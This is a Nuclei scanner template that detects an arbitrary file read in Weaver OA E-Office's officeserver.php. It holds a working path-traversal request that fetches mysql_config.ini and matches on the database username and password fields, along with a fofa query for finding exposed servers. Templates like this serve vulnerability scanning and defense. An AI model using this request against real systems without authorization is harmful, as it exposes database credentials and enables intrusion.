id: weaver-officeserver-lfi

info:
  name: OA E-Office officeserver.php Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-EOffice"
  tags: weaver,e-cology,oa,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "datapassword ="
          - "datauser ="
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100fb9aeeb75f2885f9cc403726aa4d125ca77e8facb6edec2abaffd3cafd4b4509022100e2c4560b8ffe79150e0285b4fa87e5cc1c59869c3c34f7153bd336365e6dc3b3:922c64590222798bb761d5b6d8e72950
